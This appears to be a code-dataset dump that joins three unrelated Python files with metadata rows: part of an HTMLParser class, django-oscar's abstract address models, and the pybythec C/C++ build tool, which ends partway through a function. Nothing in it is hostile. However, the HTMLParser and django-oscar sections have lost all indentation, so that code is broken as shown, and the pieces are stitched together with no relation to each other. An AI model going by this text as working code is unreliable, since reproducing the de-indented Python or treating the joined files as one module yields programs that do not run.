# the HTML 5 spec, section 8.1.2.2, doesn't allow spaces between
# </ and the tag name, so maybe this should be fixed
endtagfind = re.compile(r'</\s*([a-zA-Z][-.a-zA-Z0-9:_]*)\s*>')
class HTMLParser(_markupbase.ParserBase):
"""Find tags and other markup and call handler functions.
Usage:
p = HTMLParser()
p.feed(data)
...
p.close()
Start tags are handled by calling self.handle_starttag() or
self.handle_startendtag(); end tags by self.handle_endtag(). The
data between tags is passed from the parser to the derived class
by calling self.handle_data() with the data as argument (the data
may be split up in arbitrary chunks). If convert_charrefs is
True the character references are converted automatically to the
corresponding Unicode character (and self.handle_data() is no
longer split in chunks), otherwise they are passed by calling
self.handle_entityref() or self.handle_charref() with the string
containing respectively the named or numeric reference as the
argument.
"""
CDATA_CONTENT_ELEMENTS = ("script", "style")
def __init__(self, *, convert_charrefs=True):
"""Initialize and reset this instance.
If convert_charrefs is True (the default), all character references
are automatically converted to the corresponding Unicode characters.
"""
self.convert_charrefs = convert_charrefs
self.reset()
def reset(self):
"""Reset this instance. Loses all unprocessed data."""
self.rawdata = ''
self.lasttag = '???'
self.interesting = interesting_normal
self.cdata_elem = None
_markupbase.ParserBase.reset(self)
def feed(self, data):
r"""Feed data to the parser.
Call this as often as you want, with as little or as much text
as you want (may include '\n').
"""
self.rawdata = self.rawdata + data
self.goahead(0)
def close(self):
"""Handle any buffered data."""
self.goahead(1)
__starttag_text = None
def get_starttag_text(self):
"""Return full source of start tag: '<...>'."""
return self.__starttag_text
def set_cdata_mode(self, elem):
self.cdata_elem = elem.lower()
self.interesting = re.compile(r'</\s*%s\s*>' % self.cdata_elem, re.I)
def clear_cdata_mode(self):
self.interesting = interesting_normal
self.cdata_elem = None
# Internal -- handle data as far as reasonable. May leave state
# and data to be processed by a subsequent call. If 'end' is
# true, force handling all data as if followed by EOF marker.
def goahead(self, end):
rawdata = self.rawdata
i = 0
n = len(rawdata)
while i < n:
if self.convert_charrefs and not self.cdata_elem:
j = rawdata.find('<', i)
if j < 0:
# if we can't find the next <, either we are at the end
# or there's more text incoming. If the latter is True,
# we can't pass the text to handle_data in case we have
# a charref cut in half at end. Try to determine if
# this is the case before proceeding by looking for an
# & near the end and see if it's followed by a space or ;.
amppos = rawdata.rfind('&', max(i, n-34))
if (amppos >= 0 and
not re.compile(r'[\s;]').search(rawdata, amppos)):
break # wait till we get all the text
j = n
else:
match = self.interesting.search(rawdata, i) # < or &
if match:
j = match.start()
else:
if self.cdata_elem:
break
j = n
if i < j:
if self.convert_charrefs and not self.cdata_elem:
self.handle_data(unescape(rawdata[i:j]))
else:
self.handle_data(rawdata[i:j])
i = self.updatepos(i, j)
if i == n: break
startswith = rawdata.startswith
if startswith('<', i):
if starttagopen.match(rawdata, i): # < + letter
k = self.parse_starttag(i)
elif startswith("</", i):
k = self.parse_endtag(i)
elif startswith("<!--", i):
k = self.parse_comment(i)
elif startswith("<?", i):
k = self.parse_pi(i)
elif startswith("<!", i):
k = self.parse_html_declaration(i)
elif (i + 1) < n:
self.handle_data("<")
k = i + 1
else:
break
if k < 0:
if not end:
break
k = rawdata.find('>', i + 1)
if k < 0:
k = rawdata.find('<', i + 1)
if k < 0:
k = i + 1
else:
k += 1
if self.convert_charrefs and not self.cdata_elem:
self.handle_data(unescape(rawdata[i:k]))
else:
self.handle_data(rawdata[i:k])
i = self.updatepos(i, k)
elif startswith("&#", i):
match = charref.match(rawdata, i)
if match:
name = match.group()[2:-1]
self.handle_charref(name)
k = match.end()
if not startswith(';', k-1):
k = k - 1
i = self.updatepos(i, k)
continue
else:
if ";" in rawdata[i:]: # bail by consuming &#
self.handle_data(rawdata[i:i+2])
i = self.updatepos(i, i+2)
break
elif startswith('&', i):
match = entityref.match(rawdata, i)
if match:
name = match.group(1)
self.handle_entityref(name)
k = match.end()
if not startswith(';', k-1):
k = k - 1
i = self.updatepos(i, k)
continue
match = incomplete.match(rawdata, i)
if match:
# match.group() will contain at least 2 chars
if end and match.group() == rawdata[i:]:
k = match.end()
if k <= i:
k = n
i = self.updatepos(i, i + 1)
# incomplete
break
elif (i + 1) < n:
# not the end of the buffer, and can't be confused
# with some other construct
self.handle_data("&")
i = self.updatepos(i, i + 1)
else:
break
else:
assert 0, "interesting.search() lied"
# end while
if end and i < n and not self.cdata_elem:
if self.convert_charrefs and not self.cdata_elem:
self.handle_data(unescape(rawdata[i:n]))
else:
self.handle_data(rawdata[i:n])
i = self.updatepos(i, n)
self.rawdata = rawdata[i:]
# Internal -- parse html declarations, return length or -1 if not terminated
# See w3.org/TR/html5/tokenization.html#markup-declaration-open-state
# See also parse_declaration in _markupbase
def parse_html_declaration(self, i):
rawdata = self.rawdata
assert rawdata[i:i+2] == '<!', ('unexpected call to '
'parse_html_declaration()')
if rawdata[i:i+4] == '<!--':
# this case is actually already handled in goahead()
return self.parse_comment(i)
elif rawdata[i:i+3] == '<![':
return self.parse_marked_section(i)
elif rawdata[i:i+9].lower() == '<!doctype':
# find the closing >
gtpos = rawdata.find('>', i+9)
if gtpos == -1:
return -1
self.handle_decl(rawdata[i+2:gtpos])
return gtpos+1
else:
return self.parse_bogus_comment(i)
# Internal -- parse bogus comment, return length or -1 if not terminated
# see http://www.w3.org/TR/html5/tokenization.html#bogus-comment-state
def parse_bogus_comment(self, i, report=1):
rawdata = self.rawdata
assert rawdata[i:i+2] in ('<!', '</'), ('unexpected call to '
'parse_comment()')
pos = rawdata.find('>', i+2)
if pos == -1:
return -1
if report:
self.handle_comment(rawdata[i+2:pos])
return pos + 1
# Internal -- parse processing instr, return end or -1 if not terminated
def parse_pi(self, i):
rawdata = self.rawdata
assert rawdata[i:i+2] == '<?', 'unexpected call to parse_pi()'
match = piclose.search(rawdata, i+2) # >
if not match:
return -1
j = match.start()
self.handle_pi(rawdata[i+2: j])
j = match.end()
return j
# Internal -- handle starttag, return end or -1 if not terminated
def parse_starttag(self, i):
self.__starttag_text = None
endpos = self.check_for_whole_start_tag(i)
if endpos < 0:
return endpos
rawdata = self.rawdata
self.__starttag_text = rawdata[i:endpos]
# Now parse the data between i+1 and j into a tag and attrs
attrs = []
match = tagfind_tolerant.match(rawdata, i+1)
assert match, 'unexpected call to parse_starttag()'
k = match.end()
self.lasttag = tag = match.group(1).lower()
while k < endpos:
m = attrfind_tolerant.match(rawdata, k)
if not m:
break
attrname, rest, attrvalue = m.group(1, 2, 3)
if not rest:
attrvalue = None
elif attrvalue[:1] == '\'' == attrvalue[-1:] or \
attrvalue[:1] == '"' == attrvalue[-1:]:
attrvalue = attrvalue[1:-1]
if attrvalue:
attrvalue = unescape(attrvalue)
attrs.append((attrname.lower(), attrvalue))
k = m.end()
end = rawdata[k:endpos].strip()
if end not in (">", "/>"):
lineno, offset = self.getpos()
if "\n" in self.__starttag_text:
lineno = lineno + self.__starttag_text.count("\n")
offset = len(self.__starttag_text) \
- self.__starttag_text.rfind("\n")
else:
offset = offset + len(self.__starttag_text)
self.handle_data(rawdata[i:endpos])
return endpos
if end.endswith('/>'):
# XHTML-style empty tag: <span attr="value" />
self.handle_startendtag(tag, attrs)
else:
self.handle_starttag(tag, attrs)
if tag in self.CDATA_CONTENT_ELEMENTS:
self.set_cdata_mode(tag)
return endpos
# Internal -- check to see if we have a complete starttag; return end
# or -1 if incomplete.
def check_for_whole_start_tag(self, i):
rawdata = self.rawdata
m = locatestarttagend_tolerant.match(rawdata, i)
if m:
j = m.end()
next = rawdata[j:j+1]
if next == ">":
return j + 1
if next == "/":
if rawdata.startswith("/>", j):
return j + 2
if rawdata.startswith("/", j):
# buffer boundary
return -1
# else bogus input
if j > i:
return j
else:
return i + 1
if next == "":
# end of input
return -1
if next in ("abcdefghijklmnopqrstuvwxyz=/"
"ABCDEFGHIJKLMNOPQRSTUVWXYZ"):
# end of input in or before attribute value, or we have the
# '/' from a '/>' ending
return -1
if j > i:
return j
else:
return i + 1
raise AssertionError("we should not get here!")
# Internal -- parse endtag, return end or -1 if incomplete
def parse_endtag(self, i):
rawdata = self.rawdata
assert rawdata[i:i+2] == "</", "unexpected call to parse_endtag"
match = endendtag.search(rawdata, i+1) # >
if not match:
return -1
gtpos = match.end()
match = endtagfind.match(rawdata, i) # </ + tag + >
if not match:
if self.cdata_elem is not None:
self.handle_data(rawdata[i:gtpos])
return gtpos
# find the name: w3.org/TR/html5/tokenization.html#tag-name-state
namematch = tagfind_tolerant.match(rawdata, i+2)
if not namematch:
# w3.org/TR/html5/tokenization.html#end-tag-open-state
if rawdata[i:i+3] == '</>':
return i+3
else:
return self.parse_bogus_comment(i)
tagname = namematch.group(1).lower()
# consume and ignore other stuff between the name and the >
# Note: this is not 100% correct, since we might have things like
            # </tag attr=">">, but looking for > after the name should cover
# most of the cases and is much simpler
gtpos = rawdata.find('>', namematch.end())
self.handle_endtag(tagname)
return gtpos+1
elem = match.group(1).lower() # script or style
if self.cdata_elem is not None:
if elem != self.cdata_elem:
self.handle_data(rawdata[i:gtpos])
return gtpos
self.handle_endtag(elem)
self.clear_cdata_mode()
return gtpos
# Overridable -- finish processing of start+end tag: <tag.../>
def handle_startendtag(self, tag, attrs):
self.handle_starttag(tag, attrs)
self.handle_endtag(tag)
# Overridable -- handle start tag
def handle_starttag(self, tag, attrs):
pass
# Overridable -- handle end tag
def handle_endtag(self, tag):
pass
# Overridable -- handle character reference
def handle_charref(self, name):
pass
# Overridable -- handle entity reference
def handle_entityref(self, name):
pass
# Overridable -- handle data
def handle_data(self, data):
pass
# Overridable -- handle comment
def handle_comment(self, data):
pass
# Overridable -- handle declaration
def handle_decl(self, decl):
pass
# Overridable -- handle processing instruction
def handle_pi(self, data):
pass
def unknown_decl(self, data):
pass
# Internal -- helper to remove special character quoting
def unescape(self, s):
warnings.warn('The unescape method is deprecated and will be removed '
'in 3.5, use html.unescape() instead.',
DeprecationWarning, stacklevel=2)
return unescape(s)
| lgpl-2.1 | -4,034,221,794,916,283,000 | 36.704255 | 80 | 0.490792 | false | 4.209905 | false | false | false |
aykut/django-oscar | oscar/apps/address/abstract_models.py | 1 | 7907 | import zlib
from django.db import models
from django.utils.translation import ugettext_lazy as _
class AbstractAddress(models.Model):
"""
Superclass address object
This is subclassed and extended to provide models for
user, shipping and billing addresses.
The only required fields are last_name, line1 and postcode.
"""
# @todo: Need a way of making these choice lists configurable
# per project
MR, MISS, MRS, MS, DR = ('Mr', 'Miss', 'Mrs', 'Ms', 'Dr')
TITLE_CHOICES = (
(MR, _("Mr")),
(MISS, _("Miss")),
(MRS, _("Mrs")),
(MS, _("Ms")),
(DR, _("Dr")),
)
title = models.CharField(_("Title"), max_length=64, choices=TITLE_CHOICES, blank=True)
first_name = models.CharField(_("First name"), max_length=255, blank=True)
last_name = models.CharField(_("Last name"), max_length=255)
# We use quite a few lines of an address as they are often quite long and
# it's easier to just hide the unnecessary ones than add extra ones.
line1 = models.CharField(_("First line of address"), max_length=255)
line2 = models.CharField(_("Second line of address"), max_length=255, blank=True)
line3 = models.CharField(_("Third line of address"), max_length=255, blank=True)
line4 = models.CharField(_("City"), max_length=255, blank=True)
state = models.CharField(_("State/County"), max_length=255, blank=True)
postcode = models.CharField(_("Post/Zip-code"), max_length=64)
country = models.ForeignKey('address.Country')
# A field only used for searching addresses - this contains all the relevant fields
search_text = models.CharField(_("Search text"), max_length=1000)
class Meta:
abstract = True
def save(self, *args, **kwargs):
self._clean_fields()
self._update_search_text()
super(AbstractAddress, self).save(*args, **kwargs)
def _clean_fields(self):
"""
Clean up fields
"""
self.first_name = self.first_name.strip()
for field in ['first_name', 'last_name', 'line1', 'line2', 'line3', 'line4', 'postcode']:
self.__dict__[field] = self.__dict__[field].strip()
# Ensure postcodes are always uppercase
if self.postcode:
self.postcode = self.postcode.upper()
def _update_search_text(self):
search_fields = filter(lambda x: x, [self.first_name, self.last_name,
self.line1, self.line2, self.line3, self.line4, self.state,
self.postcode, self.country.name])
self.search_text = ' '.join(search_fields)
@property
def summary(self):
"""
Returns a single string summary of the address,
separating fields using commas.
"""
return u", ".join(self.active_address_fields())
def populate_alternative_model(self, address_model):
"""
For populating an address model using the matching fields
from this one.
This is used to convert a user address to a shipping address
as part of the checkout process.
"""
destination_field_names = [field.name for field in address_model._meta.fields]
for field_name in [field.name for field in self._meta.fields]:
if field_name in destination_field_names and field_name != 'id':
setattr(address_model, field_name, getattr(self, field_name))
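    # Illustrative usage (not part of the original module); ShippingAddress is
    # a hypothetical concrete subclass of AbstractShippingAddress:
    #
    #   shipping = ShippingAddress()
    #   user_address.populate_alternative_model(shipping)
    #   shipping.save()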
def active_address_fields(self):
u"""
Returns the non-empty components of the address, but merging the
title, first_name and last_name into a single line.
"""
self._clean_fields()
fields = filter(lambda x: x, [self.salutation(), self.line1, self.line2, self.line3,
self.line4, self.postcode])
if self.country:
fields.append(self.country.name)
return fields
def salutation(self):
u"""Returns the salutation"""
return u" ".join([part for part in [self.title, self.first_name, self.last_name] if part])
def name(self):
"""
Returns the full name
"""
return u" ".join([part for part in [self.first_name, self.last_name] if part])
def __unicode__(self):
return self.summary
class AbstractCountry(models.Model):
"""
International Organization for Standardization (ISO) 3166-1 Country list.
"""
iso_3166_1_a2 = models.CharField(_('ISO 3166-1 alpha-2'), max_length=2, primary_key=True)
iso_3166_1_a3 = models.CharField(_('ISO 3166-1 alpha-3'), max_length=3, null=True, db_index=True)
iso_3166_1_numeric = models.PositiveSmallIntegerField(_('ISO 3166-1 numeric'), null=True, db_index=True)
name = models.CharField(_('Official name (CAPS)'), max_length=128)
printable_name = models.CharField(_('Country name'), max_length=128)
is_highlighted = models.BooleanField(default=False, db_index=True)
is_shipping_country = models.BooleanField(default=False, db_index=True)
class Meta:
abstract = True
verbose_name = _('Country')
verbose_name_plural = _('Countries')
ordering = ('-is_highlighted', 'name',)
def __unicode__(self):
return self.printable_name
class AbstractShippingAddress(AbstractAddress):
u"""
Shipping address.
A shipping address should not be edited once the order has been placed -
it should be read-only after that.
"""
phone_number = models.CharField(max_length=32, blank=True, null=True)
notes = models.TextField(blank=True, null=True, help_text="""Shipping notes""")
class Meta:
abstract = True
verbose_name_plural = "shipping addresses"
class AbstractUserAddress(AbstractShippingAddress):
"""
A user address which forms an "AddressBook" for a user.
We use a separate model to shipping and billing (even though there will be
some data duplication) because we don't want shipping/billing addresses changed
or deleted once an order has been placed. By having a separate model, we allow
users the ability to add/edit/delete from their address book without affecting
orders already placed.
"""
user = models.ForeignKey('auth.User', related_name='addresses')
# Customers can set defaults
is_default_for_shipping = models.BooleanField(default=False)
is_default_for_billing = models.BooleanField(default=False)
# We keep track of the number of times an address has been used
# as a shipping address so we can show the most popular ones
# first at the checkout.
num_orders = models.PositiveIntegerField(default=0)
# A hash is kept to try and avoid duplicate addresses being added
# to the address book.
hash = models.CharField(max_length=255, db_index=True)
date_created = models.DateTimeField(auto_now_add=True)
def generate_hash(self):
u"""Returns a hash of the address summary."""
# We use an upper-case version of the summary
return zlib.crc32(self.summary.strip().upper().encode('UTF8'))
def save(self, *args, **kwargs):
u"""Save a hash of the address fields"""
# Save a hash of the address fields so we can check whether two
# addresses are the same to avoid saving duplicates
self.hash = self.generate_hash()
super(AbstractUserAddress, self).save(*args, **kwargs)
class Meta:
abstract = True
verbose_name_plural = "User addresses"
ordering = ['-num_orders']
class AbstractBillingAddress(AbstractAddress):
class Meta:
abstract = True
verbose_name_plural = "Billing addresses"
| bsd-3-clause | -9,183,936,321,529,190,000 | 38.143564 | 108 | 0.621981 | false | 4.090533 | false | false | false |
glowtree/pybythec | pybythec/__init__.py | 1 | 18150 | # -*- coding: utf-8 -*-
from pybythec import utils
from pybythec.utils import f
from pybythec.utils import PybythecError
from pybythec.BuildStatus import BuildStatus
from pybythec.BuildElements import BuildElements
import os
import sys
import time
from threading import Thread
log = utils.Logger('pybythec')
__author__ = 'glowtree'
__email__ = '[email protected]'
__version__ = '0.9.61'
def getBuildElements(osType = None,
compiler = None,
buildType = None,
binaryFormat = None,
projConfigPath = None,
globalConfigPath = None,
projConfig = None,
globalConfig = None,
currentBuild = None,
libDir = None):
'''
passthrough function that catches and reports exceptions
'''
try:
return BuildElements(
osType = osType,
compiler = compiler,
buildType = buildType,
binaryFormat = binaryFormat,
projConfig = projConfig,
projConfigPath = projConfigPath,
globalConfig = globalConfig,
globalConfigPath = globalConfigPath,
currentBuild = currentBuild,
libDir = libDir)
except PybythecError as e:
log.error(e)
return None
except Exception as e:
log.error('unknown exception: {0}', e)
return None
def build(be = None, builds = None):
'''
be: BuildElements object
builds: list of build overrides
'''
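  # Illustrative usage (not from the original source), assuming the project's
  # pybythec config files are in place next to the calling build script:
  #
  #   import pybythec
  #   pybythec.build()                    # build with the config defaults
  #   pybythec.build(builds = ['debug'])  # override the build variation(s)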
if not be:
be = getBuildElements()
if not be:
return
_runPreScript(be)
buildsRef = builds
if not buildsRef:
buildsRef = be.builds
if type(buildsRef) is not list:
buildsRef = [buildsRef]
for build in buildsRef:
try:
be.configBuild(currentBuild = build)
except PybythecError as e:
log.error(e)
continue
except Exception as e:
log.error('unknown exception: {0}', e)
continue
_build(be)
def _build(be):
'''
does the dirty work of compiling and linking based on the state setup in the BuildElements object be
'''
  threading = True # TODO: perhaps this could be a function argument
buildStatus = BuildStatus(be.targetFilename, be.buildPath)
# lock - early return
if be.locked and os.path.exists(be.targetInstallPath):
buildStatus.writeInfo('locked', '{0} is locked', be.targetName)
return True
startTime = time.time()
log.info('building ' + be.infoStr)
buildingLib = False
if be.libDir:
buildingLib = True
if not os.path.exists(be.installPath):
utils.createDirs(be.installPath)
if not os.path.exists(be.buildPath):
os.makedirs(be.buildPath)
incPathList = []
for incPath in be.incPaths:
if os.path.exists(incPath):
incPathList += ['-I', incPath]
else:
log.warning('incPath {0} doesn\'t exist', incPath)
for extIncPath in be.extIncPaths: # external include libs (for cases where 3rd party header includes are using "" instead of <> ie Unreal)
    if os.path.exists(extIncPath):
incPathList += ['-I', extIncPath]
else:
log.warning('extIncPath {0} doesn\'t exist', extIncPath)
definesList = []
for define in be.defines:
definesList += ['-D', define]
#
# qt moc file compilation, TODO: make this another compiler option, along with asm
#
mocPaths = []
for qtClass in be.qtClasses:
found = False
mocPath = f('{0}/moc_{1}.cpp', be.buildPath, qtClass)
qtClassHeader = qtClass + '.h'
for incPath in be.incPaths: # find the header file, # TODO: should there be a separate list of headers ie be.mocIncPaths?
includePath = incPath + '/' + qtClassHeader
if not os.path.exists(includePath):
continue
if os.path.exists(mocPath) and float(os.stat(mocPath).st_mtime) < float(os.stat(includePath).st_mtime) or not os.path.exists(mocPath):
buildStatus.description = 'qt moc: ' + utils.runCmd(['moc'] + definesList + [includePath, '-o', mocPath])
if not os.path.exists(mocPath):
buildStatus.writeError(buildStatus.description)
return False
mocPaths.append(mocPath)
found = True
if not found:
buildStatus.writeError('can\'t find {0} for qt moc compilation', qtClassHeader)
return False
for mocPath in mocPaths:
be.sources.append(mocPath)
buildStatusDeps = [] # the build status for each dependency: objs and libs
threads = []
i = 0
#
# compile
#
objPaths = []
cmd = [be.compilerCmd, be.objFlag] + incPathList + definesList + be.flags
if threading:
for source in be.sources:
buildStatusDep = BuildStatus(source)
buildStatusDeps.append(buildStatusDep)
thread = Thread(None, target = _compileSrc, args = (be, cmd, source, objPaths, buildStatusDep))
thread.start()
threads.append(thread)
i += 1
else:
for source in be.sources:
buildStatusDep = BuildStatus(source)
buildStatusDeps.append(buildStatusDep)
_compileSrc(be, cmd, source, objPaths, buildStatusDep)
i += 1
#
# build library dependencies
#
libCmds = []
libsBuilding = []
if be.binaryType == 'exe' or be.binaryType == 'plugin':
for lib in be.libs:
libName = lib
if be.compiler.startswith('msvc'):
libCmds += [libName + be.staticExt] # you need to link against the .lib stub file even if it's ultimately a .dll that gets linked
else:
libCmds += [be.libFlag, libName]
# check if the lib has a directory for building
if threading:
for libSrcDir in be.libSrcPaths:
libSrcDir = os.path.join(libSrcDir, lib)
if os.path.exists(libSrcDir):
libsBuilding.append(lib)
buildStatusDep = BuildStatus(lib)
buildStatusDeps.append(buildStatusDep)
thread = Thread(None, target = _buildLib, args = (be, libSrcDir, buildStatusDep))
thread.start()
threads.append(thread)
i += 1
break
else:
for libSrcPath in be.libSrcPaths:
          if not os.path.exists(libSrcPath):
log.warning('libSrcPath {0} doesn\'t exist', libSrcPath)
continue
libSrcPath = os.path.join(libSrcPath, lib)
if os.path.exists(libSrcPath):
libsBuilding.append(lib)
buildStatusDep = BuildStatus(lib)
buildStatusDeps.append(buildStatusDep)
            _buildLib(be, libSrcPath, buildStatusDep)
i += 1
break
# wait for all the threads before checking the results
for thread in threads:
thread.join()
allUpToDate = True
for buildStatusDep in buildStatusDeps:
if buildStatusDep.status == 'failed':
# NOTE: changed from buildStatusDep.description.encode('ascii', 'ignore') which fixed issue on macOs
      buildStatus.writeError('{0} failed because {1} failed because...\n\n{2}\n...determined in {3} seconds\n\n', be.infoStr, buildStatusDep.name,
buildStatusDep.description, str(int(time.time() - startTime)))
return False
elif buildStatusDep.status == 'built':
allUpToDate = False
# revise the library paths
for i in range(len(be.libPaths)):
revisedLibPath = be.libPaths[i] + be.binaryRelPath
if os.path.exists(revisedLibPath):
be.libPaths[i] = revisedLibPath
else: # try without the currentBuild leaf dir, ie 3rd party libs likely won't have them
revisedLibPath = f('{0}/{1}/{2}/{3}/{4}', be.libPaths[i], be.osType, be.buildType, be.compilerVersion, be.binaryFormat)
if os.path.exists(revisedLibPath):
be.libPaths[i] = revisedLibPath
  # check for multiple instances of a lib: link errors due to linking to the wrong version of a lib can be a nightmare to debug
# if you don't suspect it's the wrong version
libsFound = {} # lib name, array of paths where it was found
for p in be.libPaths:
for lib in be.libs:
if be.compiler.startswith('msvc'):
staticPath = f('{0}/{1}{2}', p, lib, be.staticExt)
dynamicPath = f('{0}/{1}{2}', p, lib, be.dynamicExt)
else:
staticPath = f('{0}/lib{1}{2}', p, lib, be.staticExt)
dynamicPath = f('{0}/lib{1}{2}', p, lib, be.dynamicExt)
if os.path.exists(staticPath) or os.path.exists(dynamicPath):
if lib in libsFound:
libsFound[lib].append(p)
else:
libsFound[lib] = [p]
for l in libsFound:
libPaths = libsFound[l]
if len(libPaths) > 1:
      log.warning('lib {0} found in more than one place: {1}\n', l, libPaths)
#
# linking
#
linkCmd = []
if allUpToDate and os.path.exists(be.targetInstallPath):
buildStatus.writeInfo('up to date', '{0} is up to date, determined in {1} seconds\n', be.infoStr, str(int(time.time() - startTime)))
if not buildingLib:
_runPostScript(be)
return True
# microsoft's compiler / linker can only handle so many characters on the command line
msvcLinkCmdFilePath = be.buildPath + '/linkCmd'
if be.compiler.startswith('msvc'):
msvcLinkCmd = f('{0}"{1}" "{2}" {3}', be.targetFlag, be.targetInstallPath, '" "'.join(objPaths), ' '.join(libCmds))
msvcLinkCmdFp = open(msvcLinkCmdFilePath, 'w')
msvcLinkCmdFp.write(msvcLinkCmd)
msvcLinkCmdFp.close()
linkCmd += [be.linker, '@' + msvcLinkCmdFilePath]
if be.showLinkerCmds:
log.info('\nmsvcLinkCmd: {0}\n', msvcLinkCmd)
else:
linkCmd += [be.linker, be.targetFlag, be.targetInstallPath] + objPaths + libCmds
if be.binaryType != 'static': # TODO: is this the case for msvc?
linkCmd += be.linkFlags
if be.binaryType == 'exe' or be.binaryType == 'plugin' or (be.compilerRoot == 'msvc' and be.binaryType == 'dynamic'):
for libPath in be.libPaths:
if not os.path.exists(libPath):
log.warning('libPath {0} doesn\'t exist', libPath)
continue
if be.compiler.startswith('msvc'):
linkCmd += [be.libPathFlag + os.path.normpath(libPath)]
else:
linkCmd += [be.libPathFlag, os.path.normpath(libPath)]
# get the timestamp of the existing target if it exists
linked = False
targetExisted = False
oldTargetTimeStamp = None
if os.path.exists(be.targetInstallPath):
oldTargetTimeStamp = float(os.stat(be.targetInstallPath).st_mtime)
targetExisted = True
if be.showLinkerCmds:
log.info('\n{0}\n', ' '.join(linkCmd))
buildStatus.description = utils.runCmd(linkCmd)
if os.path.exists(be.targetInstallPath):
if targetExisted:
if float(os.stat(be.targetInstallPath).st_mtime) > oldTargetTimeStamp:
linked = True
else:
linked = True
if linked:
log.info('linked ' + be.infoStr)
else:
buildStatus.writeError('linking failed because {0}', buildStatus.description)
return False
# copy dynamic library dependencies to the install path
if be.copyDynamicLibs:
if be.binaryType == 'exe' or be.binaryType == 'plugin':
for lib in be.libs:
for libPath in be.libPaths:
dynamicPath = libPath + '/'
if be.compilerRoot == 'gcc' or be.compilerRoot == 'clang':
dynamicPath += 'lib'
dynamicPath += lib + be.dynamicExt
if os.path.exists(dynamicPath):
utils.copyfile(dynamicPath, be.installPath)
buildStatus.writeInfo('built', '{0} built {1}\ncompleted in {2} seconds\n', be.infoStr, be.targetInstallPath, str(int(time.time() - startTime)))
sys.stdout.flush()
# run a post-build script if it exists
if not buildingLib:
_runPostScript(be)
return True
#
# private functions
#
def _compileSrc(be, compileCmd, source, objPaths, buildStatus):
'''
be (in): BuildElements object
compileCmd (in): the compile command so far
  source (in): the c or cpp source file to compile (every source file gets its own object file)
objPaths (out): list of all object paths that will be passed to the linker
buildStatus (out): build status for this particular compile, defaults to failed
'''
if not os.path.exists(source):
buildStatus.writeError('{0} is missing, exiting build', source)
return
objFile = os.path.basename(source)
objFile = objFile.replace(os.path.splitext(source)[1], be.objExt)
objPath = os.path.join(be.buildPath, objFile)
objPaths.append(objPath)
# check if it's up to date
objExisted = os.path.exists(objPath)
if objExisted:
objTimestamp = float(os.stat(objPath).st_mtime)
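    # skip the compile when the object file is newer than both the build
    # config and every source / header it depends on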
if objTimestamp > be.latestConfigTimestamp and not utils.sourceNeedsBuilding(be.incPaths, source, objTimestamp):
buildStatus.status = 'up to date'
return
# if not utils.sourceNeedsBuilding(be.incPaths, source, objTimestamp):
# buildStatus.status = 'up to date'
# return
# Microsoft Visual C has to have the objPathFlag cuddled up directly next to the objPath - no space in between them (grrr)
if be.compiler.startswith('msvc'):
cmd = compileCmd + [source, be.objPathFlag + objPath]
else:
cmd = compileCmd + [source, be.objPathFlag, objPath]
if be.showCompilerCmds:
log.info('\n' + ' '.join(cmd) + '\n')
buildStatus.description = utils.runCmd(cmd)
if os.path.exists(objPath):
if objExisted:
if float(os.stat(objPath).st_mtime) > objTimestamp:
buildStatus.status = 'built'
else:
buildStatus.status = 'built'
if buildStatus.status == 'built':
buildStatus.description = 'compiled ' + os.path.basename(source)
else:
log.error('{0} failed to build', objPath)
def _buildLib(be, libSrcDir, buildStatus):
'''
'''
libBe = getBuildElements(
osType = be.osType,
compiler = be.compiler,
buildType = be.buildType,
binaryFormat = be.binaryFormat,
projConfig = be.projConfig,
globalConfig = be.globalConfig,
currentBuild = be.currentBuild,
libDir = libSrcDir)
if not libBe:
return
build(libBe)
# read the build status
buildStatus.readFromFile(libSrcDir, be.buildDir, be.binaryRelPath)
def clean(be = None, builds = None):
'''
'''
if not be:
be = getBuildElements()
if not be:
return
buildsRef = builds
if not buildsRef:
buildsRef = be.builds
if type(buildsRef) is not list:
buildsRef = [buildsRef]
for build in buildsRef:
try:
be.configBuild(currentBuild = build)
except PybythecError as e:
log.error(e)
return
except Exception as e:
log.error('unknown exception: {0}', e)
return
_clean(be)
def _clean(be = None):
'''
cleans the current project
be (in): BuildElements object
'''
# remove any dynamic libs that are sitting next to the exe
if os.path.exists(be.installPath) and (be.binaryType == 'exe' or be.binaryType == 'plugin'):
for fl in os.listdir(be.installPath):
libName, ext = os.path.splitext(fl)
if ext == be.dynamicExt:
if be.compilerRoot == 'gcc' or be.compilerRoot == 'clang':
libName = libName.lstrip('lib')
for lib in be.libs:
if lib == libName:
p = be.installPath + '/' + fl
try:
os.remove(p)
except Exception:
log.warning('failed to remove {0}', p)
elif ext == '.exp' or ext == '.ilk' or ext == '.lib' or ext == '.pdb': # msvc files
p = be.installPath + '/' + fl
try:
os.remove(p)
except Exception:
log.warning('failed to remove {0}', p)
if not os.path.exists(be.buildPath): # canary in the coal mine
log.info(be.infoStr + ' already clean')
return True
dirCleared = True
for fl in os.listdir(be.buildPath):
p = be.buildPath + '/' + fl
try:
os.remove(p)
except Exception:
dirCleared = False
log.warning('failed to remove {0}', p)
if dirCleared:
os.removedirs(be.buildPath)
if os.path.exists(be.targetInstallPath):
os.remove(be.targetInstallPath)
target, ext = os.path.splitext(be.targetInstallPath)
if ext == '.dll':
try:
os.remove(target + '.exp')
os.remove(target + '.lib')
except Exception:
pass
try:
os.removedirs(be.installPath)
except Exception:
pass
log.info(be.infoStr + ' all clean')
return True
def cleanAll(be = None, builds = None):
'''
cleans both the current project and also the dependencies
'''
if not be:
be = getBuildElements()
if not be:
return
buildsRef = builds
if not buildsRef:
buildsRef = be.builds
if type(buildsRef) is not list:
buildsRef = [buildsRef]
for build in buildsRef:
try:
be.configBuild(currentBuild = build)
except PybythecError as e:
log.error(e)
continue
except Exception as e:
log.error('unknown exception: {0}', e)
continue
_clean(be)
# clean library dependencies
for lib in be.libs:
for libSrcPath in be.libSrcPaths:
libPath = os.path.join(libSrcPath, lib)
if os.path.exists(libPath):
libBe = getBuildElements(
osType = be.osType,
compiler = be.compiler,
buildType = be.buildType,
binaryFormat = be.binaryFormat,
projConfig = be.projConfig,
globalConfig = be.globalConfig,
currentBuild = be.currentBuild,
libDir = libPath)
if not libBe:
return
clean(libBe) # builds = build)
def _runPreScript(be):
'''
looks for a pre-build script and loads it as a module
'''
pathRoot = '.'
if be.libDir:
pathRoot = be.libDir
preScriptPath = pathRoot + '/pybythecPre.py'
if not os.path.exists(preScriptPath):
preScriptPath = pathRoot + '/.pybythecPre.py'
if os.path.exists(preScriptPath):
import imp
m = imp.load_source('', preScriptPath)
m.run(be)
def _runPostScript(be):
'''
looks for a post-build script and loads it as a module
'''
pathRoot = '.'
if be.libDir:
pathRoot = be.libDir
